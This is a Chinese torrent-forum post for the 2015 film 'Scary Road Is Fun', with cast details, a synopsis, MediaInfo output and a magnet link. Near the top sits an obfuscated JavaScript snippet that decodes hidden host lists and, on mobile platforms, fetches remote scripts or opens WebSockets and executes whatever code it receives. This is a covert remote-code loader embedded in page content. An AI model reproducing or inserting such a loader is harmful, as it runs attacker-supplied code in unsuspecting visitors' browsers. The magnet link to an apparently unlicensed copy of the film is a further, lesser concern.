陌路惊笑[国语音轨].Scary.Road.Is.Fun.2015.1080p.HDR.WEB-DL.H265.AAC 1.59GB

版主小s 1月前 139

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 陌路惊笑 / Scary Road Is Fun
◎年  代 2015
◎产  地 中国大陆
◎类  别 喜剧 / 惊悚
◎语  言 汉语普通话
◎上映日期 2015-04-17(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt6879082/
◎豆瓣评分 2.6/10 (669人评价)
◎豆瓣链接 https://movie.douban.com/subject/26325489/
◎片  长 88分钟
◎导  演 三木单丹 Samm Chan (id:1348425)
◎编  剧 三木单丹 Samm Chan (id:1348425)
       刘星彤 Xingtong Liu (id:1348427)
       李捷 Jie Li (id:1348424)
       张玲玲 Lingling Zhang (id:1359086)
◎演  员 张峻宁 Junning Zhang (id:1002998)
       唐文龙 Michael Tong (id:1043564)
       何昊阳 Haoyang He (id:1322767)
       张炜迅 Weixun Zhang (id:1317058)
       姚文雪 Wenxue Yao (id:1313643)
       潘彦妃 Yanfei Pan (id:1326048)
       李昂 Ang Li (id:1337228)
       杨迪 Di Yang (id:1317329)
       苑琼丹 King-Tan Yuen (id:1274445)

◎标  签 惊悚 / 喜剧 / 雷人 / !烂片 / 2015 / 大陆 / 搞笑 / 恐怖

◎简  介
  保险公司职员刘威在收了吴百亿的好处费后,帮对方的老婆BABY投了巨额保单。谁知未过多久,BABY在邪气十足的阴山弄十里弯死于离奇车祸。刘威恐慌非常,狮子大张口向吴百亿索要巨额封口费。与此同时,他的勾当被无良侦探范健得知,范健顺时要挟刘威引诱有妇之夫田幂幂私奔,借机卷走其夫的全部身家财产。此后刘威顺利带着田幂幂出逃,他们好不容易跑到弄十里弯,而对方老公也尾随而至。与此同时,范健死于非命,被他坑蒙拐骗过的穆兰和另一个男子一路追踪线索,也来到了鬼影幢幢的弄十里弯。                                    
                                难以预料的事件交替发生,这些人即将度过一个恐怖阴森的夜晚……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 268354549177446726453776241206531574168 (0xC9E334C95947F8DF5C1A2E5A7309C998)

  4. Complete name                            : 陌路惊笑[email protected]OM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 1.59 GiB

  8. Duration                                 : 1 h 26 min

  9. Overall bit rate                         : 2 632 kb/s

  10. Encoded date                             : UTC 2021-08-07 13:42:34

  11. Writing application                      : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library                          : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. HDR format                               : SMPTE ST 2086, HDR10 compatible

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 26 min

  21. Bit rate                                 : 2 506 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 808 pixels

  24. Display aspect ratio                     : 2.40:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 25.000 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.065

  31. Stream size                              : 1.51 GiB (95%)

  32. Default                                  : Yes

  33. Forced                                   : No

  34. Color range                              : Limited

  35. Color primaries                          : BT.2020

  36. Transfer characteristics                 : PQ

  37. Matrix coefficients                      : BT.2020 non-constant

  38. Mastering display color primaries        : R: x=0.708000 y=0.292000, G: x=0.170000 y=0.797000, B: x=0.130000 y=0.046000, White point: x=0.312700 y=0.329000

  39. Mastering display luminance              : min: 0.0000 cd/m2, max: 0 cd/m2


  40. Audio

  41. ID                                       : 2

  42. Format                                   : AAC LC

  43. Format/Info                              : Advanced Audio Codec Low Complexity

  44. Codec ID                                 : A_AAC-2

  45. Duration                                 : 1 h 26 min

  46. Bit rate                                 : 124 kb/s

  47. Channel(s)                               : 2 channels

  48. Channel layout                           : L R

  49. Sampling rate                            : 44.1 kHz

  50. Frame rate                               : 43.066 FPS (1024 SPF)

  51. Compression mode                         : Lossy

  52. Stream size                              : 76.6 MiB (5%)

  53. Language                                 : Chinese

  54. Default                                  : Yes

  55. Forced                                   : No



TAGS 惊悚 喜剧

磁力链:
  • magnet:?xt=urn:btih:53E9D39389E34D2ABFD607CAB604BAA2F8DB8B09
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖